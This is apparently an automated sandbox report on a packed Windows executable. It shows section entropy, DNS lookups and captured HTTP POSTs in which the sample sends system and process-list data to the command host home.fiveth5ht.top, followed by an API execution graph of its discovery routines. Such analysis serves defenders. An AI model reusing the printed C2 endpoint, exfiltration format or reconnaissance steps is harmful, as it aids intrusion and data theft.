IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x708a00 | 0x688 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xc48234 | 0x10 | ivnslrrb
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0xc481e4 | 0x18 | ivnslrrb
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Sections
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
(no name) | 0x1000 | 0x6db000 | 0x288a00 | e2d4923926421c29da8b2b6ede093138 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x6dc000 | 0x1ac | 0x200 | 4fb8010be5ec8f056c54261ae0f1dc9c | False | 0.58203125 | data | 4.566955777548672 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x6dd000 | 0x1000 | 0x200 | 6363462e4ea156e03144265f6be7871e | False | 0.166015625 | data | 1.1763897754724144 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
(no name) | 0x6de000 | 0x3a5000 | 0x200 | aab351558a0bdf722840afaf1ec4654a | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
ivnslrrb | 0xa83000 | 0x1c6000 | 0x1c5400 | 2ac548e8b7cdc4fdb6edc14e3f0c964f | False | 0.9946421030405406 | data | 7.955475045686641 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
jopxztyl | 0xc49000 | 0x1000 | 0x400 | e62e3417e6d2f92c07915f6f66187cfb | False | 0.7412109375 | data | 5.896959447047402 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant | 0xc4a000 | 0x3000 | 0x2200 | cc12b76140b0144a29460f02fbff82f6 | False | 0.06755514705882353 | DOS executable (COM) | 0.8340242830560558 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Resources
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_MANIFEST | 0xc48244 | 0x152 | ASCII text, with CRLF line terminators | | | 0.6479289940828402
Imports
DLL | Import
kernel32.dll | lstrcpy
Network packet timeline (Timestamp | Source Port | Dest Port | Source IP | Dest IP)
                                                            Dec 28, 2024 09:53:33.541914940 CET4972080192.168.2.681.29.149.125
                                                            Dec 28, 2024 09:53:33.541959047 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.541974068 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.541982889 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.541985989 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.541990042 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.541992903 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.542028904 CET4972080192.168.2.681.29.149.125
                                                            Dec 28, 2024 09:53:33.542095900 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.542099953 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.542157888 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.542162895 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.542252064 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.542295933 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.542299986 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.542372942 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.542376995 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.542454958 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.542459011 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.542570114 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.542583942 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.542722940 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.542737007 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.542804003 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.542808056 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.542898893 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.542902946 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.542929888 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.543021917 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.543025970 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.543102980 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.543107033 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.543111086 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.543113947 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.580662966 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.598784924 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.598926067 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.599003077 CET4972080192.168.2.681.29.149.125
                                                            Dec 28, 2024 09:53:33.605838060 CET4972080192.168.2.681.29.149.125
                                                            Dec 28, 2024 09:53:33.613014936 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.613147974 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.656393051 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.656398058 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.656451941 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.656455994 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.656523943 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.656527996 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.656532049 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.657299042 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.657303095 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.657363892 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.657366991 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.657398939 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.657463074 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.657466888 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.657507896 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.657553911 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.657609940 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.657613993 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.657679081 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.657682896 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.657726049 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.657857895 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.657907963 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.657987118 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.657990932 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.658031940 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.658035994 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.658091068 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.658094883 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.658137083 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.658168077 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.658200979 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.658205032 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.661036015 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.661040068 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.661089897 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.661145926 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.661209106 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.661211967 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.661277056 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.661281109 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.661293030 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.661334038 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.661410093 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.661459923 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.661519051 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.661595106 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.661598921 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.661691904 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.661696911 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.661705971 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.661710024 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.661722898 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.661731005 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.661736965 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.661802053 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.661813021 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.661879063 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.661884069 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.661976099 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.661984921 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.718415976 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.725331068 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:34.455370903 CET4972680192.168.2.681.29.149.125
                                                            Dec 28, 2024 09:53:34.575001955 CET804972681.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:34.575176001 CET4972680192.168.2.681.29.149.125
                                                            Dec 28, 2024 09:53:34.575469017 CET4972680192.168.2.681.29.149.125
                                                            Dec 28, 2024 09:53:34.694976091 CET804972681.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:35.843194008 CET804972681.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:35.843298912 CET804972681.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:35.843511105 CET4972680192.168.2.681.29.149.125
                                                            Dec 28, 2024 09:53:35.843813896 CET4972680192.168.2.681.29.149.125
                                                            Dec 28, 2024 09:53:35.963231087 CET804972681.29.149.125192.168.2.6
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 28, 2024 09:53:26.954652071 CET | 61533 | 53 | 192.168.2.6 | 1.1.1.1
Dec 28, 2024 09:53:26.954799891 CET | 61533 | 53 | 192.168.2.6 | 1.1.1.1
Dec 28, 2024 09:53:27.094289064 CET | 53 | 61533 | 1.1.1.1 | 192.168.2.6
Dec 28, 2024 09:53:27.094310999 CET | 53 | 61533 | 1.1.1.1 | 192.168.2.6
Dec 28, 2024 09:53:31.820557117 CET | 52020 | 53 | 192.168.2.6 | 1.1.1.1
Dec 28, 2024 09:53:31.820679903 CET | 52020 | 53 | 192.168.2.6 | 1.1.1.1
Dec 28, 2024 09:53:32.109877110 CET | 53 | 52020 | 1.1.1.1 | 192.168.2.6
Dec 28, 2024 09:53:32.117131948 CET | 53 | 52020 | 1.1.1.1 | 192.168.2.6
Dec 28, 2024 09:53:34.313625097 CET | 52022 | 53 | 192.168.2.6 | 1.1.1.1
Dec 28, 2024 09:53:34.313694000 CET | 52022 | 53 | 192.168.2.6 | 1.1.1.1
Dec 28, 2024 09:53:34.454217911 CET | 53 | 52022 | 1.1.1.1 | 192.168.2.6
Dec 28, 2024 09:53:34.454251051 CET | 53 | 52022 | 1.1.1.1 | 192.168.2.6
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 28, 2024 09:53:26.954652071 CET | 192.168.2.6 | 1.1.1.1 | 0x5779 | Standard query (0) | httpbin.org | A (IP address) | IN (0x0001) | false
Dec 28, 2024 09:53:26.954799891 CET | 192.168.2.6 | 1.1.1.1 | 0xbf5e | Standard query (0) | httpbin.org | 28 | IN (0x0001) | false
Dec 28, 2024 09:53:31.820557117 CET | 192.168.2.6 | 1.1.1.1 | 0x97fa | Standard query (0) | home.fiveth5ht.top | A (IP address) | IN (0x0001) | false
Dec 28, 2024 09:53:31.820679903 CET | 192.168.2.6 | 1.1.1.1 | 0x79e | Standard query (0) | home.fiveth5ht.top | 28 | IN (0x0001) | false
Dec 28, 2024 09:53:34.313625097 CET | 192.168.2.6 | 1.1.1.1 | 0x1b30 | Standard query (0) | home.fiveth5ht.top | A (IP address) | IN (0x0001) | false
Dec 28, 2024 09:53:34.313694000 CET | 192.168.2.6 | 1.1.1.1 | 0x528c | Standard query (0) | home.fiveth5ht.top | 28 | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 28, 2024 09:53:22.124440908 CET | 1.1.1.1 | 192.168.2.6 | 0xbbf1 | No error (0) | fp2e7a.wpc.2be4.phicdn.net | fp2e7a.wpc.phicdn.net | | CNAME (Canonical name) | IN (0x0001) | false
Dec 28, 2024 09:53:22.124440908 CET | 1.1.1.1 | 192.168.2.6 | 0xbbf1 | No error (0) | fp2e7a.wpc.phicdn.net | | 192.229.221.95 | A (IP address) | IN (0x0001) | false
Dec 28, 2024 09:53:27.094289064 CET | 1.1.1.1 | 192.168.2.6 | 0x5779 | No error (0) | httpbin.org | | 3.218.7.103 | A (IP address) | IN (0x0001) | false
Dec 28, 2024 09:53:27.094289064 CET | 1.1.1.1 | 192.168.2.6 | 0x5779 | No error (0) | httpbin.org | | 34.226.108.155 | A (IP address) | IN (0x0001) | false
Dec 28, 2024 09:53:32.117131948 CET | 1.1.1.1 | 192.168.2.6 | 0x97fa | No error (0) | home.fiveth5ht.top | | 81.29.149.125 | A (IP address) | IN (0x0001) | false
Dec 28, 2024 09:53:34.454217911 CET | 1.1.1.1 | 192.168.2.6 | 0x1b30 | No error (0) | home.fiveth5ht.top | | 81.29.149.125 | A (IP address) | IN (0x0001) | false
• httpbin.org
• home.fiveth5ht.top

Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49720 | 81.29.149.125 | 80 | 5260 | C:\Users\user\Desktop\ZFttiy4Tt8.exe
Timestamp | Bytes transferred | Direction | Data
Dec 28, 2024 09:53:32.241182089 CET | 12360 | OUT | POST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1
Host: home.fiveth5ht.top
Accept: */*
Content-Type: application/json
Content-Length: 567271
Data Ascii: { "ip": "8.46.123.189", "current_time": "8452132140001246344", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 50, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 328 }, { "name": "csrss.exe", "pid": 412 }, { "name": "wininit.exe", "pid": 488 }, { "name": "csrss.exe", "pid": 496 }, { "name": "winlogon.exe", "pid": 560 }, { "name": "services.exe", "pid": 632 }, { "name": "lsass.exe", "pid": 652 }, { "name": "svchost.exe", "pid": 752 }, { "name": "fontdrvhost.exe", "pid": 780 }, { "name": "fontdrvhost.exe", "pid": 788 }, { "name": "svchost.exe", "pid": 868 }, { "name": "svchost.exe", "pid": 928 }, { "name": "dwm.exe", "pid": 996 }, { "name": "svchost.exe", "pid": 436 }, { "name": "svchost.exe", "pid": 376 }, { "name": "svchost.exe", "pid": 60 }, { "name": "svchost.exe", [TRUNCATED]
Dec 28, 2024 09:53:33.598784924 CET | 212 | IN | HTTP/1.0 503 Service Unavailable
Cache-Control: no-cache
Connection: close
Content-Type: text/html
Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.6 | 49726 | 81.29.149.125 | 80 | 5260 | C:\Users\user\Desktop\ZFttiy4Tt8.exe

Timestamp | Bytes transferred | Direction | Data
Dec 28, 2024 09:53:34.575469017 CET | 284 | OUT | POST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1
Host: home.fiveth5ht.top
Accept: */*
Content-Type: application/json
Content-Length: 143
                                                            Data Raw: 7b 20 22 69 64 31 22 3a 20 22 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 5c 2f 68 31 3e 5c 6e 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 5c 6e 3c 5c 2f 62 6f 64 79 3e 3c 5c 2f 68 74 6d 6c 3e 5c 6e 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d
                                                            Data Ascii: { "id1": "<html><body><h1>503 Service Unavailable<\/h1>\nNo server is available to handle this request.\n<\/body><\/html>\n", "data": "Done1" }
                                                            Dec 28, 2024 09:53:35.843194008 CET | 212 | IN | HTTP/1.0 503 Service Unavailable
                                                            Cache-Control: no-cache
                                                            Connection: close
                                                            Content-Type: text/html
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            0 | 192.168.2.6 | 49717 | 3.218.7.103 | 443 | 5260 | C:\Users\user\Desktop\ZFttiy4Tt8.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            2024-12-28 08:53:29 UTC | 52 | OUT | GET /ip HTTP/1.1
                                                            Host: httpbin.org
                                                            Accept: */*
                                                            2024-12-28 08:53:29 UTC | 224 | IN | HTTP/1.1 200 OK
                                                            Date: Sat, 28 Dec 2024 08:53:29 GMT
                                                            Content-Type: application/json
                                                            Content-Length: 31
                                                            Connection: close
                                                            Server: gunicorn/19.9.0
                                                            Access-Control-Allow-Origin: *
                                                            Access-Control-Allow-Credentials: true
                                                            2024-12-28 08:53:29 UTC | 31 | IN | Data Raw: 7b 0a 20 20 22 6f 72 69 67 69 6e 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 0a 7d 0a
                                                            Data Ascii: { "origin": "8.46.123.189"}



                                                            Target ID:2
                                                            Start time:03:53:24
                                                            Start date:28/12/2024
                                                            Path:C:\Users\user\Desktop\ZFttiy4Tt8.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Desktop\ZFttiy4Tt8.exe"
                                                            Imagebase:0xdf0000
                                                            File size:4'528'640 bytes
                                                            MD5 hash:8CB06B0904107A21706822F2F2D90832
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:low
                                                            Has exited:true

                                                              Execution Graph

                                                              Execution Coverage:2.3%
                                                              Dynamic/Decrypted Code Coverage:0%
                                                              Signature Coverage:18.6%
                                                              Total number of Nodes:247
                                                              Total number of Limit Nodes:37
                                                              execution_graph 62812 e0d5e0 62813 e0d652 WSAStartup 62812->62813 62814 e0d5f0 62812->62814 62813->62814 62941 df29ff FindFirstFileA 62942 df2a31 62941->62942 62943 df2a5c RegOpenKeyExA 62942->62943 62944 df2a93 62943->62944 62945 df2ade CharUpperA 62944->62945 62947 df2b0a 62945->62947 62946 df2bf9 QueryFullProcessImageNameA 62948 df2c3b CloseHandle 62946->62948 62947->62946 62950 df2c64 62948->62950 62949 df2df1 CloseHandle 62951 df2e23 62949->62951 62950->62949 62815 df3d5e 62816 df3d30 62815->62816 62816->62815 62817 df3d90 62816->62817 62819 e00ab0 62816->62819 62822 e005b0 62819->62822 62821 e00acd 62821->62816 62823 e007c7 62822->62823 62824 e005bd 62822->62824 62823->62821 62824->62823 62825 e007ef 62824->62825 62826 e00707 WSAEventSelect 62824->62826 62836 df76a0 62824->62836 62825->62823 62831 e00847 62825->62831 62832 e06fa0 62825->62832 62826->62823 62826->62824 62829 e009e8 WSAEnumNetworkEvents 62830 e009d0 WSAEventSelect 62829->62830 62829->62831 62830->62829 62830->62831 62831->62823 62831->62829 62831->62830 62834 e06fd4 62832->62834 62835 e06feb 62832->62835 62833 e07207 select 62833->62835 62834->62833 62834->62835 62835->62831 62837 df76e6 send 62836->62837 62838 df76c0 62836->62838 62839 df76c9 62837->62839 62838->62837 62838->62839 62839->62824 62840 df255d 62841 1179f70 62840->62841 62842 df256c GetSystemInfo 62841->62842 62843 df2589 62842->62843 62844 df25a0 GlobalMemoryStatusEx 62843->62844 62849 df25ec 62844->62849 62845 df263c GetDriveTypeA 62847 df2655 GetDiskFreeSpaceExA 62845->62847 62845->62849 62846 df2762 62848 df27d6 KiUserCallbackDispatcher 62846->62848 62847->62849 62850 df27f8 62848->62850 62849->62845 62849->62846 62851 df28d9 FindFirstFileW 62850->62851 62852 df2906 FindNextFileW 62851->62852 62853 df2928 62851->62853 62852->62852 62852->62853 62952 e2b3c0 62953 e2b3cb 62952->62953 62954 e2b3ee 62952->62954 62957 df76a0 send 62953->62957 62958 e29290 62953->62958 
62955 e2b3ea 62957->62955 62959 df76a0 send 62958->62959 62960 e292e5 62959->62960 62961 e29392 62960->62961 62962 e29335 WSAIoctl 62960->62962 62961->62955 62962->62961 62963 e29366 62962->62963 62963->62961 62964 e29371 setsockopt 62963->62964 62964->62961 62965 e2e400 62967 e2e412 62965->62967 62968 e2e459 62965->62968 62969 e268b0 closesocket 62967->62969 62969->62968 62970 e2b400 62971 e2b425 62970->62971 62972 e2b40b 62970->62972 62975 df7770 62972->62975 62973 e2b421 62976 df77b6 recv 62975->62976 62977 df7790 62975->62977 62978 df7799 62976->62978 62977->62976 62977->62978 62978->62973 62854 df31d7 62857 df31f4 62854->62857 62855 df32dc CloseHandle 62856 df3200 62855->62856 62857->62855 62857->62856 62858 df2f17 62866 df2f2c 62858->62866 62859 df31d3 62860 df2fb3 RegOpenKeyExA 62860->62866 62861 df315c RegEnumKeyExA 62862 df31b2 RegCloseKey 62861->62862 62861->62866 62862->62866 62863 df3046 RegOpenKeyExA 62864 df3089 RegQueryValueExA 62863->62864 62863->62866 62865 df313b RegCloseKey 62864->62865 62864->62866 62865->62866 62866->62859 62866->62860 62866->62861 62866->62863 62866->62865 62867 ea4720 62871 ea4728 62867->62871 62868 ea4733 62870 ea4774 62871->62868 62876 ea476c 62871->62876 62877 ea9270 62871->62877 62873 ea4860 62880 ea4950 62873->62880 62875 ea4878 62876->62875 62884 ea30a0 closesocket 62876->62884 62885 eaa440 62877->62885 62879 ea9297 62879->62873 62883 ea4966 62880->62883 62881 ea49c5 62881->62876 62882 ea4aa0 gethostname 62882->62881 62882->62883 62883->62881 62883->62882 62884->62870 62912 eaa46b 62885->62912 62886 eaaa03 RegOpenKeyExA 62887 eaab70 RegOpenKeyExA 62886->62887 62888 eaaa27 RegQueryValueExA 62886->62888 62891 eaac34 RegOpenKeyExA 62887->62891 62908 eaab90 62887->62908 62889 eaaacc RegQueryValueExA 62888->62889 62890 eaaa71 62888->62890 62893 eaab0e 62889->62893 62894 eaab66 RegCloseKey 62889->62894 62890->62889 62897 eaaa85 RegQueryValueExA 62890->62897 62892 eaacf8 RegOpenKeyExA 62891->62892 62910 eaac54 62891->62910 
62895 eaad56 RegEnumKeyExA 62892->62895 62899 eaad14 62892->62899 62893->62894 62898 eaab1e RegQueryValueExA 62893->62898 62894->62887 62896 eaad9b 62895->62896 62895->62899 62900 eaae16 RegOpenKeyExA 62896->62900 62901 eaaab3 62897->62901 62904 eaab4c 62898->62904 62899->62879 62902 eaaddf RegEnumKeyExA 62900->62902 62903 eaae34 RegQueryValueExA 62900->62903 62901->62889 62902->62899 62902->62900 62905 eaaf43 RegQueryValueExA 62903->62905 62915 eaadaa 62903->62915 62904->62894 62906 eab052 RegQueryValueExA 62905->62906 62905->62915 62907 eaadc7 RegCloseKey 62906->62907 62906->62915 62907->62902 62908->62891 62909 eaafa0 RegQueryValueExA 62909->62915 62910->62892 62911 eaa794 GetBestRoute2 62911->62912 62912->62911 62913 eaa4db 62912->62913 62914 eaa6c7 GetBestRoute2 62912->62914 62913->62886 62913->62899 62914->62912 62915->62905 62915->62906 62915->62907 62915->62909 62979 ebb180 62982 ebb19b 62979->62982 62986 ebb2e3 62979->62986 62983 ebb2a9 getsockname 62982->62983 62985 ebb020 closesocket 62982->62985 62982->62986 62987 ebaf30 62982->62987 62991 ebb060 62982->62991 62996 ebb020 62983->62996 62985->62982 62988 ebaf4c 62987->62988 62989 ebaf63 socket 62987->62989 62988->62989 62990 ebaf52 62988->62990 62989->62982 62990->62982 62995 ebb080 62991->62995 62992 ebb0b0 connect 62993 ebb0bf WSAGetLastError 62992->62993 62994 ebb0ea 62993->62994 62993->62995 62994->62982 62995->62992 62995->62993 62995->62994 62997 ebb029 62996->62997 62998 ebb052 62996->62998 62999 ebb04b closesocket 62997->62999 63000 ebb03e 62997->63000 62998->62982 62999->62998 63000->62982 63001 eba080 63004 eb9740 63001->63004 63003 eba09b 63005 eb9780 63004->63005 63009 eb975d 63004->63009 63006 eb9925 RegOpenKeyExA 63005->63006 63005->63009 63007 eb995a RegQueryValueExA 63006->63007 63006->63009 63008 eb9986 RegCloseKey 63007->63008 63008->63009 63009->63003 62916 e295b0 62917 e295c8 62916->62917 62919 e295fd 62916->62919 62917->62919 62920 e2a150 62917->62920 62921 e2a15f 62920->62921 62923 
